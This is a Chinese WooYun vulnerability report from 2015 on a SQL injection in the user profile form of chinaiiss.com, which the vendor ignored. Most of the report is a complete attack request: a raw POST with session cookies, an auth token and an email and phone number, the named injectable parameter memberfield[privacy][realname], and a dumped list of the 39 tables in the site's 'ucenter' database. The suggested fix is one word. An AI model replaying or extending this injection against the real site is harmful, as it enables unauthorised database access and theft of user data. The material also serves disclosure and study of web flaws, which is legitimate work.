漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0111332
漏洞标题:中国战略网SQL注入漏洞
相关厂商:chinaiiss.com
漏洞作者: 忽然之间
提交时间:2015-05-27 08:27
修复时间:2015-06-01 08:28
公开时间:2015-06-01 08:28
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-05-27: 细节已通知厂商并且等待厂商处理中
2015-06-01: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
中国战略网SQL注入漏洞(虽然不知道谁结婚,还是要祝福)
详细说明:
POST /index.php?do=profile&type=submit HTTP/1.1
Host: user.chinaiiss.com
Proxy-Connection: keep-alive
Content-Length: 927
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://user.chinaiiss.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://user.chinaiiss.com/index.php?do=profile&sid=
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: cityid=1; vjuids=-5001c13ce.14d09a6666f.0.4df357a1; vjlast=1430386010; auth=6076f6ookhSwUfC4HxFvvV3noWULXIDHHxe0NWV4jUPvI%2Bzq5jz%2BFbLd2egZgycvhz%2BllHMkR8ZdlwIZYVCSRg2oZlvQnFsKaQ8zt1jjWxznrddq%2BHVwDbojBg; Hm_lvt_cd0a687f19db4e63c481a5b03c59f4e3=1430386009; Hm_lpvt_cd0a687f19db4e63c481a5b03c59f4e3=1430387205; CNZZDATA215831=cnzz_eid%3D1112028767-1430386095-%26ntime%3D1430386095
sid=&memberfield%5Brealname%5D=111&memberfield%5Bprivacy%5D%5Brealname%5D=1&memberfield%5Bgender%5D=m&memberfield%5Bprovince%5D=%E5%8C%97%E4%BA%AC&memberfield%5Bcity%5D=%E4%B8%9C%E5%9F%8E%E5%8C%BA&memberfield%5Bbirthyear%5D=1997&memberfield%5Bbirthmonth%5D=1&memberfield%5Bbirthday%5D=19&memberfield%5Bprivacy%5D%5Bbirthday%5D=1&memberfield%5Beducation%5D=2&memberfield%5Bservicestatus%5D=1&tag=%E5%A4%9A%E4%B8%AA%E6%A0%87%E7%AD%BE%E4%B9%8B%E9%97%B4%E8%AF%B7%E7%94%A8%E7%A9%BA%E6%A0%BC%E5%88%86%E5%BC%80&weapon_country=0&weapon_category=0&weapon_type=%E6%AD%A6%E5%99%A8%E7%B1%BB%E5%9E%8B&weapon_name=%E6%AD%A6%E5%99%A8%E5%9E%8B%E5%8F%B7&memberfield%5Bprivacy%5D%5Bpm%5D=1&member%5Bemail%5D=2780253779%40qq.com&memberfield%5Bprivacy%5D%5Bemail%5D=1&memberfield%5Bqq%5D=333333333&memberfield%5Bprivacy%5D%5Bqq%5D=1&memberfield%5Bmobile%5D=187138999999&memberfield%5Bprivacy%5D%5Bmobile%5D=1&memberfieldforum%5Bsightml%5D=fefefefe
~
注入参数 memberfield[privacy][realname]
漏洞证明:
当前数据库
当前用户
表
Database: ucenter
[39 tables]
+-------------------------------+
| [Table]admins |
| [Table]allfeeds |
| [Table]applications |
| [Table]badwords |
| [Table]domains |
| [Table]failedlogins |
| [Table]feeds |
| [Table]friends_group |
| [Table]friends |
| [Table]mailqueue |
| [Table]memberfields |
| [Table]members |
| [Table]membertags |
| [Table]mergemembers |
| [Table]newpm |
| [Table]notelist |
| [Table]notification |
| [Table]pm_indexes |
| [Table]pm_lists |
| [Table]pm_members |
| [Table]pm_messages_0 |
| [Table]pm_messages_1 |
| [Table]pm_messages_2 |
| [Table]pm_messages_3 |
| [Table]pm_messages_4 |
| [Table]pm_messages_5 |
| [Table]pm_messages_6 |
| [Table]pm_messages_7 |
| [Table]pm_messages_8 |
| [Table]pm_messages_9 |
| [Table]pms |
| [Table]protectedmembers |
| [Table]settings |
| [Table]sqlcache |
| [Table]sysnotification_filter |
| [Table]sysnotification_userac |
| [Table]sysnotification |
| [Table]tags |
| [Table]vars |
+----------------
修复方案:
过滤
版权声明:转载请注明来源 忽然之间@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-06-01 08:28
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无